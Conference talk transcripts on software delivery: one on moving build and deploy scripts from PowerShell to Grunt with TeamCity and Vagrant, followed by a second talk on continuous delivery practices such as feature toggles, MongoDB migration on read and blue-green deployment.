Everybody read the screen? Awesome. Grunt, simple grunt, it's gone off and it's done everything. What it's done is it's run JSHint on everything and it's filled my database and it's run all my acceptance tests against the database.
We have a README that basically says you need to do a brew install of Mongo, have that running, and then this interacts with Mongo in the background. At the end, it comes back and says 100 tests have passed in 121 milliseconds. We've copied the build. If I do grunt dev, we just do a JSHint and we clear the database. I can't connect to it at the minute. At that point, we can run different pieces of the system. Andy wrote a blog post. His blog post was grunt your deployments too. We were like, why do we get things built by grunt and then deployed by another system? Why can't we just get grunt to deploy our system for us? He registered a task called deploy. Deploy called a list of other tasks. It's gone off and got the artifacts. It took the app offline. It stops the application. It makes the release directory. It updates all the new symlinks for the new deployment. We do an SFTP deploy. We do an npm update. We set some configuration. We start. We wait for the application to start. We run our warm-up scripts. We verify. We put it back online and we have clean up afterwards. This is a much better pipeline straight away. It's much more explicit about exactly the tasks that it does. We're not hiding this away in TeamCity. This is not a slating of build tools in any way. They can just be misused in a very big way. But we have the same task locally that we can run against a test database or a test acceptance site that TeamCity would run in our CI environment or our pre-prod environment or our production environment. What it looks like in TeamCity is this. For build, we have a TeamCity step that says grunt. The grunt task is build. We're not hiding anything away. It's as simple as it possibly gets. There's no extra configuration parameters. What we like to use our CI tool as is just somewhere to orchestrate a job. Everything else must be encapsulated. We can go and we can have a look at the deploy step. There we go. The task is just deploy API.
Again, all the logic is held inside the Gruntfile. There were no hidden surprises when a developer decided to run a command locally that didn't happen in production. If we have a look at some of the contents of those. We have an artifact task. We have a clean. We have a clear DB. We have get artifacts. We have HTTP. If we look at HTTP, it's just going off and just running service status pages. We have a page on our internal systems that's like service status, just to make sure that the application is running. Our internal applications only. Don't go and beat on our website. I'm on to you. We just make sure we can actually warm it up and we collect any errors if it returns an incorrect response code. It doesn't do anything too bad at all. If we have a look at something like JSHint, we're basically just running a simple JSHint across all JavaScript files in the solution. We were actually starting to use code in our build system and in our scripting system. These are not complex scripts. Those seven lines right there, that's all available open source. You Google how to JSHint with grunt. That's almost the first result you'll get. Don't try it. Maybe it's not the first result. The point here is that why reinvent the wheel? We had a second chance at creating a good build system, a good deploy system, and we could use that. We could use that second chance in order to make it better. We could be a lot more interested in things. Then Andy was like, okay, so we do our builds and we do our deploys. How can we run our acceptance tests? We don't want every developer to have a copy of these five systems on their machine. We don't want to be running our tests against Mac OS X when we deploy onto Ubuntu in production. What do we do? He hooked into a tool called Vagrant. We have another task called grunt acceptance.
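The HTTP warm-up task being described can be sketched as a small function that hits a list of status URLs and collects anything that does not answer 200. The request function is injected so the logic can be exercised without a network; the names here are assumptions for illustration, not the real OpenTable script.

```javascript
// Sketch of a warm-up/verify step: request each status page and
// return a list of errors. An empty list means the site is healthy.
async function warmUp(urls, request) {
  const errors = [];
  for (const url of urls) {
    try {
      const res = await request(url); // expected to resolve to { statusCode }
      if (res.statusCode !== 200) {
        errors.push(`${url} returned ${res.statusCode}`);
      }
    } catch (err) {
      errors.push(`${url} failed: ${err.message}`);
    }
  }
  return errors;
}
```

In a real grunt task the injected `request` would be a thin wrapper around Node's `http.get`, and a non-empty error list would fail the deploy before the server goes back into the load balancer.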
What grunt acceptance does is at this point, it does a vagrant up, actually spins up a physical machine using Vagrant, sorry, a VM on my physical machine using Vagrant. It will run some tests against that VM and it will destroy it. If I'm in the directory, I can say grunt acceptance and it's running the vagrant up task. It goes off and it clones an Ubuntu VM box from another repository onto my machine. It will install Mongo, it will install nginx, it will install NPM and Node and all these bits and pieces and it will run all my tests against them. It takes like 10 minutes to run. Before a developer checks in some code, they take 10 minutes to go grunt acceptance, and this works against a known operating system. That was huge, absolutely massive. He wrote a blog post about this called grunt your acceptance too. What we're trying to show is that we're not doing anything special. We took this opportunity when we had a new app and we were like, right, what does our app need to do? We continually added new pieces to the pipeline when we needed them. The main thing, I'm just going to kill that because I don't want that spinning up, the main thing is that the build files themselves were packaged with the app. When a developer checked out the code from GitHub, they had not only the actual application code itself but they also had the build code. It meant that everything could be done on the same checkout. A developer could test everything locally. They had the Vagrantfile that they could test everything with. They use Redis now in there as well. We're really starting to move forward. Any questions? Awesome. Anybody just want me to shut up so we can go for lunch? We're almost there, I promise. This was for a Node.js app. Can the scripts be reused? Yes. Were they reused? Yes and no. I said before that we didn't want these to be reused. We fell into the trap before of having central scripts. We did not want to fall into that same trap.
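The grunt acceptance flow just described, spin up a VM, run the suite against it, always tear it down, can be sketched with the shell-out injected so the sequence is testable without Vagrant installed. Only `vagrant up` and `vagrant destroy -f` are standard Vagrant CLI commands; the middle command is a made-up placeholder for whatever runs the test suite against the VM.

```javascript
// Sketch of an acceptance-test wrapper around Vagrant. The exec
// function is injected; in a real grunt task it would shell out
// via child_process or a plugin like grunt-shell.
function runAcceptance(exec) {
  exec('vagrant up');
  try {
    exec('grunt mocha --target=vm'); // placeholder for the real test command
  } finally {
    // tear the VM down even if the tests throw, so a failed run
    // doesn't leave a stale VM on the developer's machine
    exec('vagrant destroy -f');
  }
}
```

The `try`/`finally` is the important part: the ten-minute `grunt acceptance` run always leaves the machine clean, pass or fail.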
If another team who wanted to build and package a Node.js app in the same way wanted to use the scripts, they would have to go and clone our repository and they would have to see what we're doing with it. That's a good thing and a bad thing, because sometimes it creates silos and sometimes it creates a non-similar way of doing things. But in an organization of 150 engineers, you're never all going to be doing things in the same way, especially if you have lots of languages and you're doing cross-platform development work. But there were pieces of the puzzle that could be reused: things like pushing the artifact, clearing down a database, getting things from the artifact store, HTTP warm-up scripts. All of these are actually reusable scripts. If we really wanted to, we could create an npm repository inside our company, and then the engineers could go npm install OpenTable HTTP and that would bring those down. But we're not at that point.

In fact, what I can show you now, speaking about cross-platform: this promoted-offer application is actually a C# application. In here, we have a Gruntfile right there. We have a build folder right there. If we go into the build folder, we can see that we've got some other things in here. We've got NUnit. Dammit. Thank you. We have NUnit, we have SQL, we have other pieces of the puzzle in there. As I said, this is a C# app. If we go inside our grunt tasks, we can see here that we have build-SQL. This goes off and builds a change set from SQL Server, and it stores that with the build artifact. Then we have sqlcommand.js. We have package-GitHub-data, a HipChat notifier, get-last-pinned-build-number-from-TeamCity. This is another app that's gone through a transformation. New pieces of the pipeline were put in place because it was a more complex app to build. It wasn't just a C# app. There's another one, feature-dashboard, which is an MVC app that builds on Mono.
Because it builds on Mono, I can build it on my local machine on a Mac. Let's do that. Then we have grunt tasks for that. We've got one at the bottom called xbuild, because we want to execute xbuild itself rather than MSBuild. All I have to do as a developer is just do grunt build; it cleans the build first, and it realizes it's actually doing a C# build. We're in a situation now where our packaging and our builds are in the same state locally as they are in our environment. It's the same for deploy. If I really wanted to, right here, I could run a grunt deploy and pass in some environment data, and it would go off and connect to those environments and do the deploy for me. It would just take a little longer because I'm going across the VPN to San Francisco. We can run any of these scripts at all times. This was a very key thing for us.

Are there alternatives? It's really good to see some people here from ScriptCS, because I actually put ScriptCS in there. Let's see. Thank you. I told Justin that I would put it in there. It is actually an alternative. He's going to take a picture of it because I troll these guys all the time. They're awesome about being trolled, which is really funny. ScriptCS is actually there; you can script stuff with it. I'm sorry, Adam, I should have put your tool on here as well. You've got one called Bau. Is it Bau, you pronounce it? The new hotness right now is Gulp. Anybody using Gulp? Anybody know what Gulp is? It's another JavaScript build framework; they claim to be a streaming build framework. There are always alternatives out there. This is not saying you must go and use Grunt. Grunt may not fit what you're doing. There's Gradle: if you're in the Java world, you can go and rewrite stuff in Gradle. You can continue to use PowerShell; just be very good at what you do with it. Or you can use Make. Does anybody use Make still?
Hadi Hariri wrote a blog post on basically cluttering the ecosystem with systems that are written as alternatives to Make; why don't we just stick with Make itself? A lot of people are starting to feel like that again. Scripting frameworks are the new JavaScript frameworks. If you really want to, you can go and create one in a very small amount of time. It would be very immature and it probably wouldn't do an awful lot, but you can do it. You can write one from scratch. Why reinvent the wheel, though, right? If somebody's already written quite a successful one, there's no point in rewriting the wheel. There's really no point.

Do I think that PowerShell is bad for scripting? 100% not. We've come from a company where one or two people were responsible for the build script. It was like me and one other person who cared. When that was the case, and everyone was doing things in exactly the same way, building the same style of applications in the same language, it worked fantastically. As soon as you moved away from central management, as soon as teams were given autonomy and teams were able to go off and do bits and pieces in their own fashion, then variations very quickly appeared in the system. What we had was a poor design choice: centrally managed build scripts are not a good thing. Does anybody have centrally managed build scripts? They're tough. They're really tough and they can break an awful lot. We also don't write applications solely in ASP.NET anymore. PowerShell for Node apps: you can do it, but just because you can do it doesn't mean we should, right? The future for us is that we just don't know. We don't know what type of apps we're going to be building next. Maybe there's a new app that we have to build next week and we'll use Gulp for it. Maybe there's a new C# app and we'll use ScriptCS for it. I'm just joking. The point here is that there are so many resources available out there.
We can go and have a look at the Grunt plugins website. Everybody see that? You've got contrib, you've got watch, uglify, concat, cssmin, less, karma, coffee, compass. They're all out there. Some of these have been downloaded a huge number of times, nearly 400,000 times for JSHint. Anything with contrib in front means it's a core package maintained by the Grunt team. If it doesn't have contrib in front, then it's actually outside of Grunt themselves. This comes with its own problems, right? If I go and I say npm install, it goes off and it downloads the world. If you depend on those external packages, people do make breaking changes to them. Be wary. If you do go and use an open source tool like this in order to build stuff, there are changes that happen all the time. Sometimes that's okay. Just be wary, be careful that that's the case. Let's just cancel that.

I have probably 20 minutes left. We're definitely not going to take 20 minutes. We're going to take five, and then I'll take a couple of minutes for questions and we can run and get in the lunch queue first. I have some tips. Be mindful about what might happen in the future. You may change completely what you're doing. Don't throw all your resource at creating these amazing build scripts. Have good build scripts and reliable build scripts, but evolve them over time. As your application grows and your company needs change and your team size grows, evolve your build scripts to evolve with the application itself. And 100% do not centrally manage your build scripts. I can't stress this enough. I've been bitten by this, where I've had people calling me at midnight saying the builds don't work. What do you mean it doesn't work? It doesn't build. What did you do to it? I added this new parameter. We would just have this never-ending list of problems.
I would get in in the morning, and I'd change something before I go home, and the San Francisco team are blocked because I've broken their part of the build scripts. I didn't know what they were using it for. Centrally managed is tough. It's really tough.

Get lots of feedback. These build scripts: is anybody not using a continuous integration tool? Who uses TeamCity, Jenkins, Bamboo? Cool. If you're not using a continuous integration tool, get a continuous integration tool. Even TFS. Just listen: if you're using a tool, that's a good thing. We'll talk about the tool another time, but that's something different. Use TeamCity. There we go. Just make it simple. Make your scripts simple, so that the way they execute inside your continuous integration tool is the same as on your developer machine and on Jeff's developer machine. They have to be consistent. The last one is: have empathy for your other developers. Don't just go and make lots of changes and not tell anyone, because that makes you look like a douchebag. When you get phoned because you've changed their build scripts, you're the one that has to suffer. You're the one that has to apologize to the team for stopping their application at that moment.

Does anybody have any questions? You must have questions. You're a CI and CD guy; how do you feel about this? Scripts packaged with your application, or centrally managed build scripts? Okay. The more you get into continuous integration and continuous delivery work, the more you'll see that having a good build system is extremely important. You must be able to rely on it. You really must. Any other questions? Yeah. 100%. That's why I said, depending on the type of organization you're in or what type of application you're building, there are alternatives. It's not: you must use Grunt, Grunt is the best. If you're a 100% Microsoft shop but you don't want to use PowerShell, then use ScriptCS. It's good for that, right? Is it? Is it good? Absolutely.
So there you go. Bau is even better, right? This is more of a: choose what tool you're comfortable with, and choose what tool is simple but very effective at getting the job done. If I was still building C# and .NET apps, I would 100% still be using PowerShell, because I just find it phenomenal. Every time they make a new release of PowerShell, it adds so much more to the language. I don't understand the C#-building-C# thing. Hey, I'm a Ruby developer, I don't understand these things. But go off and try some things. Go off and try some tools. If you're a .NET developer, go and try Gradle. There are like 26 chapters of documentation on Gradle. That'll be fun reading before you go to bed one evening. But there are lots of tools out there. Get advice. Twitter's a great place: I have this application to be built, what technology should I build it in? You'll probably get 100 responses saying Gulp, Gulp. And then you'll get a load of responses from the C# guys going ScriptCS or PowerShell. But speak to people. Get some insight into how they've evolved their build scripts and how they've evolved their environment going forward.

If anybody wants to send me a rant or tell me I'm wrong, please do. I haven't put my email on there because I'm awful at email; I have a backlog of emails to reply to. So tweet me, because I am addicted to Twitter. I'm actually always on Twitter. So challenge me. Tell me why I shouldn't be building something in Grunt. I'll happily have a conversation with people about it. Continuous integration and continuous delivery is something I'm very passionate about, and being able to communicate with other people about their experiences always helps me as well. There are always other people's views on this. I'm not always right on this, you can quote me. But this is true, right? We all have our own ways of doing things. Let's go and get some lunch.
Thanks guys. Thank you.
I am a huge fan of PowerShell. I use it for Windows infrastructure automation. I used to use it for build and deploy systems for ASP.NET applications. I feel that there are simpler alternatives for build and deploy systems out there. This is when I was introduced to Grunt. Grunt is a JavaScript-based task runner. As it is JavaScript, it is multiplatform. It can be used to build and deploy ASP.NET applications as well as Node.js applications. During this talk, I will create a build and deploy system with Grunt. This will replace the PowerShell build and deploy system that I already have. I will then integrate the new Grunt scripts with TeamCity to show how simple it is.
10.5446/50631 (DOI)
Good, here we go. A supernova is a stellar explosion that easily outshines everything around it. It's an explosion with unpredictable impact on galaxies, on planets, on stars. And that's pretty much what our releases looked like a few years ago, probably three to four years ago. Would users be able to use our website after we had released it? Would I be able to sign on and sign in again? And how can we deliver frequently, without being offline, to about 10 million users? That's our question today.

Our target back then was to establish a smoothly running system of releases, maybe as smooth as these bottles in the animated graphic. This production line must never stop running as long as bottles of water are produced. Our releases were to never stop as long as we produce software.

I am Robert. I'm pretty excited to be here today. This is my first time in Oslo, and I'm from Germany. I'm with gutefrage.net. So let's do a first poll: who of you has ever heard of gutefrage.net? That's not too many; they should have included an advertisement slide next, but I'll keep it short. I'm with Germany's biggest question-and-answer community, with all of our users producing the content, and we enjoy a little more than 17 million registered users with almost 60 million visits per month. I've been into agile product development, Scrum, Kanban, XP, for about six years now, and I'm in charge of agile product management at gutefrage. Our goal at gutefrage is to transform us into an agile enterprise, including marketing, sales, finance, HR and all the other business units, being guided by the agile manifesto. If I'm not presenting at a conference, I do have hobbies and I do have a private project: I'm building a house together with my wife. And I'm pretty excited to be joined today by a good friend of mine, whom I met at AutoScout24, the company I was with before joining gutefrage, and with whom I was in a Scrum team back at AutoScout24.

Okay, my name is Simon. Never mind my last
name; it's unpronounceable in any other language than German. Well, but very naturally, I'm married, I have a little daughter, and I've been developing software for 13 years. I've been with AutoScout24 in Munich since 2010 and I'm leading eight developer teams there. A few words about the company so that you have some context about what we're talking about. Has anybody ever heard of AutoScout24? Oh, yeah, so I win then. Has anybody maybe even bought a car or sold a car through our website? No? Okay, that's pretty much the same number. Okay, AutoScout24 was born as a platform for buying and selling cars. We help people find the right car for them, and the services if they already have a car. We're present in 18 countries, unfortunately not in Norway or the other northern European countries, so it's no surprise that nobody has heard of us. About 10 million people use AutoScout24 every month, that is, the websites and apps on mobile phones. So it's all about cars, but I always say at heart we're actually an IT company. We have about a hundred employees in IT and we build good software, and that's what we want to talk about today. You can take the seats over there if you want. Give me a minute.

So back in 2009, what, five years ago, we started to introduce Scrum. Let us do a second poll: who of you has ever made use of the Scrum framework? That's my people, okay. So back in 2009 this meant to us splitting our project teams into cross-functional teams, comprising a product owner, up to six software developers, a quality manager and a Scrum master. And we did report important improvements. We enjoyed better quality in terms of fewer bugs, and, as humans, we do make mistakes; whenever we made a mistake, we got to realize this earlier, at an earlier stage of development. So we gained in efficiency and in speed.
We were about to have increments of our software ready multiple times a week. Nevertheless, we were faced with monthly releases. And this is not what agile talks about, right? It talks about shipping software of value for customers as often as possible, the moment it's done. Not with us; we had to wait for another scheduled release. So we actually realized our releases hurt a lot. We knew they were exhausting, and we just didn't like them.

So what to do about it? Why not try to ship software live the moment it's ready? We wanted to ship our features when they were ready. We did not want to wait any longer for a scheduled release. We didn't want to think about releases as a kind of leftover from the last sprint that anyone, not me, not my team, has to ship. Unfortunately, this kills your motivation. We did not enjoy drive; it was exhausting, stressful, and of course error-prone. And even worse, we had to realize that this was kind of waterfall-ish: developing software and releasing it at a very, very late stage. Bad things. And we always keep in mind: if it's not us who ships the features, it's our competitors.

And as change was ever present back then, with our agile mindset we just tried to change things. Even though we did not know what continuous delivery is all about, we just kicked it off. The only thing we knew for sure is there would be lots of changes, incremental changes, getting things done one by one.

So the first thing we tried to understand is: why are our releases time-consuming? Why are they annoying? Why do we have to wait for another release to be scheduled? I keep comparing our releases to container ships. They are large, they're carrying many, many containers, and it takes long hours or even weeks for the ship to arrive at the next harbor. What if a container breaks? How can you find it? How can you fix it?
And it's pretty much the same with our releases. We're carrying many, many features per release. A release took us one week to get live, from the start of delivery until "yes, we're live", and the frequency was about one release per month. And we found bugs while releasing, and we had dependencies between our features, so it was just difficult to find them. And if we found a bug, shall we wait for the other teams to fix that single bug, being aware that this will delay the scheduled release?

So there was room to improve our releases. The first idea that popped into our minds was: if we manage to develop software independently, we should be able to ship it independently. And that's what we tried: feature branching. To us this meant dedicated development environments per user story, hence per team, as one team is developing one user story at a time. And hey, that was great, that was cool, that was fun, because our mainline was green all over the sprint. But we had to pay our dues at the end of the sprint, because if up to six teams are developing software in sync, they all have to merge this back to the mainline at the end of the sprint, probably on the last day of the sprint. And it is a huge effort just to orchestrate all these teams merging their code back to the mainline. And to be honest, this very, very late integration of software resulted in more obstacles than ever before. So we got rid of feature branching and tried to focus back on what is known among professional software engineers as continuous integration.

So continuous integration is nothing new; we've been hearing about it for years and years. I still want to talk about it again, because I believe there are two big misconceptions that we still have today with continuous integration. The first is the one that we had: we thought we could do continuous integration on a branch. But if you use feature branches, you're by definition not integrating continuously, and keeping changes separate
over time is not continuous integration and will cause problems. So we do not use branches anymore. We develop everything on a mainline that is straight like this road, and we merge all changes daily onto it. So this leaves us with little merges, with only a day's worth of changes of a person or a pair.

So what does this look like? We have TeamCity running, which on every commit, or push in the case of Git, pulls the sources from source control, builds, runs unit and integration tests and static code analysis, and installs it on a test environment. Now, is this continuous integration? This is technology that works and it's nice, but, and I believe here is the second misconception of continuous integration, continuous integration is not about technology. It's about a mindset. It is not a server that compiles and installs something automatically somewhere. It's about developing software that works all the time, that is always ready to ship. And without this continuity, the best build server doesn't help.

Now of course, changing software is not as smooth as this river. It always comes in chunks, but the more changes you dam up, the more problems you'll have. And in this way, real continuous integration is a foundation for continuous delivery. So when somebody asks me now, do you do continuous integration, I don't say "yeah, I have Jenkins running", or TeamCity or TFS or whatever it is. I say: yeah, we do not do feature branches, and we're sometimes red, but we're mostly green.
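The on-commit chain just described (pull, build, unit and integration tests, static analysis, install) is a fail-fast sequence: a red stage stops everything after it. A small sketch of that idea; the stage names are illustrative, not TeamCity's API:

```javascript
// Run pipeline stages in order and stop at the first failure.
// Each stage is { name, run } where run() returns true on success.
function runPipeline(stages) {
  var completed = [];
  for (var i = 0; i < stages.length; i++) {
    if (!stages[i].run()) {
      return { green: false, failedAt: stages[i].name, completed: completed };
    }
    completed.push(stages[i].name);
  }
  return { green: true, completed: completed };
}
```

The point of the sketch is the "mostly green" discipline: nothing downstream runs once a stage goes red, so a broken build never reaches the test environment.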
So, on to go-live. What we do is: we do not release every commit, which is what you could understand under continuous delivery, but we want to always be able to release. And as a developer, I know everything that I commit will go live. Okay, that's no wonder, but I don't know when. It might be right after I commit or push, or it might be the next day. I only know everything that I commit has to work, because it might go live right away. And this thing, that every commit must be releasable, requires a lot of discipline, of course.

Now we have one mainline, we do continuous integration on it, and we want to be able to release at any time. But we also have several teams working on one code base, and each team maybe develops different features at one time. Now not all these features are complete at the same time, so we definitely release incomplete features. How can you do this without creating the big chaos? There are different possibilities. The first one is to just hide new functionality until it's complete. So if you build a new page, you would put the links to the new page in only when the page is ready. Or you can build stuff incrementally: you first build the data access layer, then the business logic, then the display logic, and you enable editing the data only when everything else is complete. What we also use a lot is feature toggles. Who has heard of feature toggles? Okay, it's also called feature flippers or switches or such. I see many of you know it. Let me just give a quick example of how we do this and the learnings from it.

This is a part of the central configuration of one part of our platform, which is called garage portal. It's basically a service that enables
It's basically a service that enables Garages to offer their services online and users to find those services and compare them and book them online So this is YAML just because it's simple and readable and you can see four feature toggles Each has a name and the settings for our different environments So dev would be the local developer machines CI is the environment where the continuous integration server installs the latest version and live is the live environment You can for example see this Future offer toggle which is only switched on on the local machine. So it's inactive development You have to support chat toggle which is already switched on on CI So it's being tested and the all service funnel is switched on on all environments. So it's probably Ready to be taken out of the code base Switch status How does this look in the code when we use it? This is a part of the main page where the garage can edit its data It's an ASP. Do not MVC razor view because that net is our main development platform, but whole feature toggle things basically technology Technostics you can do it in every in every technology When the features on we show a partial where the garage can edit a certain set of data When the features off the partial is simply not shown. So the garage doesn't even know that the data is there and can be added What do we do here? We have an additional if in the code So we basically branch an additional time the code and we do branching in in the code instead of source control So it's still a branch, but it's all in the code base and it makes it easier to handle This is a very simple example Of course you can imagine more complex ones where you might switch out an implementation of an interface for another So feature toggles give us the possibility to develop Features in the background without neglecting continuous integration. 
Of course, they're no silver bullet and we've had our problems One is that in the code you just saw in the configuration code This is by definition untestable because it's different in every environment and in the beginning we had a separate setting for the acceptance test environment and of course we tripped over that on acceptance test environment It worked when live boom didn't work So now we have just one setting and the acceptance test environment takes its setting from the live setting Not all changes can be handled this way, but it works quite well for us And feature toggle switches flippers come with an adrobic What maybe whenever you add one increase the complexity of your code structure So keep in mind there's a key to key takeaway Monitor the number of feature toggles you're using and get rid of them when you don't need them any longer So this is a example how we do it at good if I would just keep track of our feature toggles in a list That summarizes the name of the toggle created it when it was created and whether it can be deleted or not indicating Yes, oh no So keep track on that and make sure you you you reduce the complexity of your code once you don't need to toggle any longer Okay, so it's nice we can switch our application logic back and forth, but what about the data If you change the structure of your persisted data, it doesn't work that simple Like adding fields or changing names in the database is something different now Traditionally use relational for relational database. We use update scripts. We do that too for our Oracle database But we had quite a bit of pain with that now the pain has reduced somewhat since we started giving Responsibility for database updates to the development teams and now that we're releasing more frequently with less changes in every release But the pain still remains So when do you actually run these update scripts before you put the new code on the service on the web service or after or during? 
Or do you need a downtime when you run the update scripts? Do you have dependencies between them and have to run one after the other in a certain order? To avoid all these things, when we started with the garage portal, which is our younger product, so to say, we decided to use MongoDB. Who's heard of MongoDB? Okay, who's actually using it? Okay, then I'll say two words about it. MongoDB is a document database, so it does not have tables; it has collections instead, and a record is basically a JSON document in such a collection. The data inside a document is a hierarchical structure, and the interesting thing is that the documents in one collection can have different structures. So it's very flexible in that, and we've chosen this flexibility explicitly to ease continuous delivery, and in this case it actually worked. Let me show an example of this.

What we do in the garage portal is basically serialize our domain objects into documents in the database. So we'd have a document in the garage collection with all the data of one garage in it, and when we load the data, we basically deserialize it into a CLR object. Now bear with me through a scenario: we wanted to make garages able to offer additional services, free services, with what they offered on the platform. So for example, when you leave your car with the garage to have some service done on it, they would give you a replacement vehicle free of charge. To display this online, we added a field to the garage domain class; IncludedServices, it's called. Now, the documents already in the database didn't have that field. So what we did is add this function to the data access code, and it's called every time a garage document is loaded. For those of you who haven't worked with MongoDB: a BSON document is the binary representation of the JSON document in the MongoDB API. What happens in this code?
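The C# function being walked through here isn't reproduced in the transcript, but its logic can be sketched in JavaScript; the field name mirrors the talk, the function name and the empty-list default are assumptions:

```javascript
// Lazy migration on read: make sure a loaded garage document has the
// new includedServices field, defaulting to an empty list. Documents
// that already have the field pass through untouched.
function migrateGarage(doc) {
  if (!('includedServices' in doc)) {
    doc.includedServices = [];
  }
  return doc;
}
```

Whenever the garage next saves its data, this migrated shape is what gets written back, which is exactly the creeping migration described a bit later.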
I think it's simple enough to figure out even if you're not familiar with C#. We just look: is there already an element IncludedServices? If not, the element is added. That's all. If the element is already there, nothing happens. So when a garage logs on, the document without the field is read, the field is added through this code, and whenever the garage saves its data, for whatever reason, the new structure is persisted to the database. Now again, this is a simple example, but of course you can imagine more complex scenarios.

So what are we doing here? We've created backwards compatibility. The application can read the old and the new structure, and it always writes the new structure. And this is possible because we can have documents with different structure in one collection. And we do not have any operation interruption; we do not have to run a script manually. This all works on the go. Now, not every garage will log on within a limited amount of time, and in the end you want all your documents to have the new structure. So at first we still wrote update scripts in JavaScript, because that's the language of MongoDB, and we ran them at some point in the end, which doesn't need downtime. But still we had to run this update script, and we had duplicate logic: one in C#, which we just saw, and the other one in JavaScript. And we didn't like that. So what we do now is:
automation Automation for sure no doubt about that is key If you want to get to the stage that he be able to release continuously Even though our fixed build was automated our leases still took long The build the test the deployment now automation came into play For example, but provisioning of environments testing deployment building and Making sure that the same config is deployed on any environment, but is this all? We didn't think so So even though the build was automated think I think there's a question. Oh, yes up there is a question This one Yeah, I'd say there's no recipe for that, you know, you'd have to think about it and and I mean establish how you How you proceed in in that case? So I can't give you an answer we'd probably do it in some way every time but The thing is this works for the most common changes so we have a lot of changes in in the front end and Little features that we try out and then we see like a B testing see what works best for bigger changes You probably have to put more brainpower into it. Yeah Did it answer it in some way? Okay? Okay, any other questions? Okay Don't continue with our build system So the obvious solution to us what let's invest in Hardware to buy new build machines that allow for parallel builds Well, it was a good idea and we got faster. Yes, but at the end we realized that there was another even better solution why not stripping our build systems down why not get it leaner and Getting our code structure less complex make it simpler and that's even compiling the whenever you try to automate things make sure You keep your code as simple as possible Well, that's a story that's cool, but now it comes to a crucial point Releasing and remember we did not want to be offline when releasing and there are two different scenarios One of them is the blue green deployment. Has anyone of you ever heard of blue green deployment? 
Okay, a couple of hands showing up. So the key point about blue-green deployment is that you split your web servers into two different pools, and they are both online at the same time when you're not releasing. Whenever you release, the load balancer manages it: the first one, let's say the blue one, is taken offline while the green one is still online, and the new code is deployed on the blue half of the pools, tested, and taken online again — again managed by the load balancer. And as soon as the blue half is online again with the new code, the load balancer takes the green one, the other half, offline, brings the new code onto it, and takes it online again. Following this simple principle, you are never offline while releasing. The most crucial part in this scenario is making the load balancer orchestrate these changes. But there's another one you could try. Simon? Okay, just to repeat the question: how do you go about databases with blue-green deployment? Well, I've heard of people talking about blue-green deployment for databases. We haven't done it; I don't think it's really a good scenario. So we decouple these things and do them separately — this is for web server deployment. So the question is: do you use it also for rollbacks, to see whether it works live, and what do you do when you have database changes included? First question, rolling back.
Yes, of course. So the idea is that while the blue pool is inactive, you can actually test it and see if it works live, and then roll back to the old version if you see that it doesn't, without impacting any users. The other question, about database changes: I believe it's a very good idea to actually decouple your code changes from your database changes, in that you keep, as we saw before, the code backwards compatible with the new version of the database — or better, with the old version. So you can decouple these, and you don't get into problems when you do blue-green deployment with database changes interrelated. Okay, there's another one. "I don't see how that works in your case" — yeah, okay, so the question is: what am I talking about, I just showed some code where you actually write new data, so you can't just switch back to the old version. I suppose that is correct. Of course, when you write data in a new structure, you are being sort of destructive about your data. So if you want to be backwards compatible here, you'd probably have to have an intermediate version where you write both versions. Say you rename a field: you still write both fields, the old name and the new name, and only when you see that it's working live, and after some time, do you remove the one with the old name. I'm pretty sure this doesn't work for every scenario. So blue-green deployment is good if you have a lot of changes in the front end which don't really go into the database, and you have to think about it when you do database changes, okay? There's another one up there. So the question, if I got you right, is: do you do backups before you release, or what other rollback strategy do you have — is that correct? Okay. Well, we do not actually have a rollback strategy.
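To make the data decoupling concrete, here is a minimal sketch of the two patterns just described — filling in a missing field when an old document is read, and writing both the old and the new field name during a rename. It's in JavaScript rather than the talk's C#, and all field names ("includedServices", "town", "city") are invented for illustration, not AutoScout24's real schema.

```javascript
// Pattern 1: migrate on read - old documents get the new field with a
// default, new documents pass through unchanged.
function migrateOnRead(doc) {
  if (!("includedServices" in doc)) {
    doc.includedServices = [];   // the new field, added with a default
  }
  return doc;
}

// Pattern 2: intermediate dual-write during a rename - persist both the
// old field ("town") and the new one ("city") until the rename is live.
function save(doc, cityName) {
  doc.city = cityName;           // new name, read by the new code
  doc.town = cityName;           // old name, still read by the old code
  return doc;
}

const oldDoc = migrateOnRead({ name: "Garage A" });
console.log(oldDoc.includedServices);   // []
const saved = save({}, "Berlin");
console.log(saved.city, saved.town);    // Berlin Berlin
```

With both patterns in place, either code version can read any document, which is what lets a release roll forward without a maintenance window.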
We only go forward. So that is the idea: taking the risk of not being able to roll back, which of course means you have to have high quality all the time — I'll get to that in a minute. And the other thing is, of course we do backups, but not before every release. We do backups regularly, I think every night, and if something goes wrong and we have to go back to the backup, then we'll have to do it, but it hasn't happened in a long time. Okay, we can take more questions at the end, I suppose. Now, another thing, to be honest: we're talking big about blue-green deployment here, and we say we've been doing it for years, and just a few weeks ago we actually discovered that we always had exceptions on our live servers when we deployed. We found out that we still cut off connections, because we just told the load balancer to switch hard from one moment to another — and we found that out only recently. So now we're doing it more intelligently: we wait for connections to actually end, and then we switch over to the other pool. So you have to be intelligent about all this stuff. Okay, we have feature toggles and we have blue-green deployment. Now we want to go one step further. Why?
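As an aside, the blue-green switch described a moment ago might be sketched like this — a hypothetical load balancer tracks which pool is live, a release deploys to the idle pool, health-checks it, and only then swaps. None of these names are AutoScout24's actual tooling; this is only the mechanism.

```javascript
// Two pools; only one receives user traffic at a time.
const pools = { blue: { version: "v1" }, green: { version: "v1" } };
let live = "blue";

const idle = () => (live === "blue" ? "green" : "blue");

function release(newVersion, healthy) {
  const target = idle();
  pools[target].version = newVersion;  // deploy to the offline pool
  if (!healthy(pools[target])) {
    return false;                      // failed check: live pool untouched
  }
  live = target;                       // swap - users now hit the new code
  return true;
}

release("v2", p => p.version === "v2");
console.log(live, pools[live].version); // green v2
```

A real switch also has to drain open connections before taking a pool offline — the hard cut-over mentioned above is exactly what caused the exceptions on the live servers.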
